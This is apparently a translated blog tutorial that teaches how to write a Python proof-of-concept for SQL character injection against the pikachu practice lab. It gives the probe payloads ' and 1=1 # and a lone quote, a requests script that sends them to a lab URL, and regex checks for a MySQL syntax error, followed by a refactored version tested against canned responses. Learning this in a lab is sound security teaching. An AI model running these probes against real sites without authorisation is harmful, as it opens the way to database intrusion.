Pikachu character injection for Day1 POC and exp learning
2022-07-21 20:53:00 【Try to be a big man M0_ sixty-eight million seventy-four thousa】
Day 1: PoC and exp learning, pikachu character injection
Before starting, you need a basic understanding of Python syntax and of the requests and re modules, as well as some knowledge of PoCs, exps and HTTP. (The author is still learning too; please bear with me and point out anything that is wrong. QAQ)
requests and re
Writing and using both PoCs and exps relies on these two Python libraries.
requests: simulates web requests and the corresponding interaction, i.e. sends the packets.
re: regular expressions, used to check whether the returned response matches the characteristics of the vulnerability and so confirm whether the vulnerability exists.
For detailed usage, see the documentation of requests and re.
PoC and exp
The difference between a PoC and an exp is destructiveness. A PoC (proof of concept) proves a point, i.e. verifies whether the vulnerability exists. An exp (exploit) deliberately exploits the vulnerability.
pikachu SQL character injection
The pikachu target range is used here as the example for writing a simple PoC and exp.
Finding the vulnerability
First exploit the vulnerability by hand, then write the PoC and exp following the same discovery and exploitation steps. Since the vulnerability here is obvious, I won't go into detail and will start writing the PoC right away.
PoC
The first step is verifying the vulnerability: deciding whether an SQL injection point exists.
1. Variables
First, define the variables that make up the HTTP request to be sent.
url = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php"  # URL of the injection point to verify
name = ["' and 1=1 #", "'"]  # test payloads
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "}  # custom HTTP headers
for i in range(2):
    sqlname = {
        "name": name[i], "submit": " Inquire about "}  # injection parameters (name field and submit button value)
2. Send the HTTP request
for i in range(2):
    sqlname = {
        "name": name[i], "submit": " Inquire about "}  # injection parameters
    res = requests.get(url=url, headers=head, params=sqlname)  # send the GET request
3. Check whether the vulnerability exists
Run a regular-expression match against the body of the response to confirm whether the vulnerability is present.
x = 0  # counter of matched checks; initialised so that `x += 1` cannot hit an undefined name
for i in range(2):
    sqlname = {
        "name": name[i], "submit": " Inquire about "}  # injection parameters
    res = requests.get(url=url, headers=head, params=sqlname)  # send the GET request
    # pattern must match the lab's "username does not exist" notice text exactly
    if i == 0 and re.findall(" What you entered username non-existent , Please re-enter !", res.text):  # query executed correctly
        x = 1
        # print(x)
    if i == 1 and re.findall("You have an error in your SQL syntax;", res.text):  # query produced a syntax error
        x += 1
        # print(x)
if x == 2:
    print(" There is an injection vulnerability !")
Run it to verify.
Complete code:
import re
import requests

url = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php"  # URL of the injection point to verify
name = ["' and 1=1 #", "'"]  # test payloads
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "}  # custom HTTP headers
x = 0  # counter of matched checks; initialised so that `x += 1` cannot hit an undefined name
for i in range(2):
    sqlname = {
        "name": name[i], "submit": " Inquire about "}  # injection parameters
    res = requests.get(url=url, headers=head, params=sqlname)  # send the GET request
    # pattern must match the lab's "username does not exist" notice text exactly
    if i == 0 and re.findall(" What you entered username non-existent , Please re-enter !", res.text):
        x = 1
        # print(x)
    if i == 1 and re.findall("You have an error in your SQL syntax;", res.text):
        x += 1
        # print(x)
if x == 2:
    print(" There is an injection vulnerability !")
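The following is an added example, not code from the article or from the pikachu project. It keeps the article's two probes and two response signatures but separates the decision logic from the network so it can be exercised offline: the `fetch` callable, the `make_http_fetch` helper, and the `CANNED` and `PATCHED` response bodies are assumptions of this example, and the "not found" pattern matches the article's translated wording rather than the lab's real notice text.

```python
import re
from typing import Callable, Dict, Optional

# Probe payloads from the article: a condition that keeps the query valid and
# a lone quote that breaks it when input is concatenated into SQL.
PROBES: Dict[str, str] = {
    "valid_condition": "' and 1=1 #",
    "broken_quote": "'",
}

# Response signatures. Assumption: the "not found" pattern matches the translated
# notice used in the article; against the real lab it must be the exact text the
# page returns for an unknown username.
SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    "valid_condition": re.compile(r"username non-existent"),
    "broken_quote": re.compile(r"You have an error in your SQL syntax;"),
}


def verify(fetch: Callable[[str], str]) -> Dict[str, bool]:
    """Send each probe through fetch(payload) -> response body and record whether
    the expected signature appears. fetch is injected so the decision logic can
    be tested with canned responses instead of a live target."""
    return {key: bool(SIGNATURES[key].search(fetch(payload)))
            for key, payload in PROBES.items()}


def is_injectable(results: Dict[str, bool]) -> bool:
    """Same rule as the article's counter reaching 2: both probes must match."""
    return all(results[key] for key in PROBES)


def make_http_fetch(url: str, headers: Optional[Dict[str, str]] = None) -> Callable[[str], str]:
    """Hypothetical helper that builds a fetch function backed by requests.
    requests is imported lazily so the rest of this file runs without it."""
    import requests
    session = requests.Session()
    ua = headers or {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

    def fetch(payload: str) -> str:
        # "Inquire about" is the article's translated value of the submit button
        resp = session.get(url, params={"name": payload, "submit": "Inquire about"},
                           headers=ua, timeout=10)
        return resp.text

    return fetch


# Constructed sample response bodies standing in for the lab (not captured output).
CANNED: Dict[str, str] = {
    "' and 1=1 #": "<p class='notice'>What you entered username non-existent , Please re-enter !</p>",
    "'": "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version",
}
# A backend using parameterised queries treats the quote as data: no syntax error,
# just the normal "not found" notice for both probes.
PATCHED = "<p class='notice'>What you entered username non-existent , Please re-enter !</p>"


def demo() -> Dict[str, bool]:
    """Run the check against the constructed vulnerable and patched responses."""
    vulnerable = verify(lambda payload: CANNED[payload])
    patched = verify(lambda payload: PATCHED)
    return {"vulnerable_target": is_injectable(vulnerable),
            "patched_target": is_injectable(patched)}


if __name__ == "__main__":
    print(demo())  # {'vulnerable_target': True, 'patched_target': False}
```

Keeping the signature matching in `verify` and the verdict in `is_injectable` means the PoC's logic can be unit-tested without a live target, and the same functions can later be pointed at the lab by passing `make_http_fetch(url)` as the `fetch` argument.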
The next post covers exploiting the vulnerability, i.e. writing the exp~~